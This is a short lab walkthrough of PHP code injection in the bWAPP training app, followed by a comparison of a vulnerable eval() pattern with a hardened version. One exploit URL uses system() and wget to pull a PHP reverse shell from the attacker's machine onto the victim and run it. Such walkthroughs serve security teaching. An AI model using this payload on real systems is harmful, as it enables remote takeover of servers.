PHP Code Injection


PHP code injection is a vulnerability that allows an attacker to inject custom code into the server-side scripting engine. It occurs when an attacker can control all or part of an input string that is fed into an eval() function call, because eval() executes its argument as code.
As you can see, the message is shown in the URL, so we can manipulate it.

Now how can we exploit this?
Using PHP's system() function, we can execute any system command and get a shell.
To get a shell we cannot directly run nc or any one-liner; as an alternative, we can upload a PHP reverse shell and execute it using this RCE.
First, host your PHP payload.
Then download it onto the victim’s machine:
192.168.140.138/bWAPP/phpi.php?message="a";system("wget http://192.168.140.136/teck-nc.php -O /tmp/teck.php")


Our file has been uploaded successfully. Now let’s trigger that file and get a reverse shell.
And we got the shell.
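
The root cause described at the top of this post, next to a hardened form, as an added example (not bWAPP's source and not code from the original post). The function names are hypothetical and the sample input is constructed; only the parameter name "message" comes from the URL above.

```php
<?php
// Added example. Function names are hypothetical; "message" is the
// parameter name seen in the URL on this page.

// Vulnerable pattern: request data is concatenated into a string that
// eval() runs as PHP. A statement separator in the value ends the echo,
// and everything after it executes as code on the server.
function render_message_vulnerable(array $request): void
{
    eval('echo ' . $request['message'] . ';');
}

// Hardened form: the value is only ever handled as data. There is no
// eval(), and the output is HTML-encoded so it cannot become markup.
function render_message_safe(array $request): string
{
    $message = $request['message'] ?? '';

    // Reject non-string values (e.g. message[]=x) and oversized input.
    if (!is_string($message) || strlen($message) > 200) {
        return '';
    }

    return htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed input shaped like the request on this page, with a harmless
// phpversion() call standing in for the command.
$constructed = ['message' => '"a";echo phpversion()'];

// Safe path: the input comes back as inert, encoded text and nothing in
// it is interpreted as PHP.
echo render_message_safe($constructed), PHP_EOL;

// A non-string value is rejected and yields an empty string.
var_dump(render_message_safe(['message' => ['x']]));
```

The vulnerable function is defined for comparison only and is never called. Removing eval() is the fix; the encoding and length check address how the value is displayed.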

~ Hack the World and Stay Noob
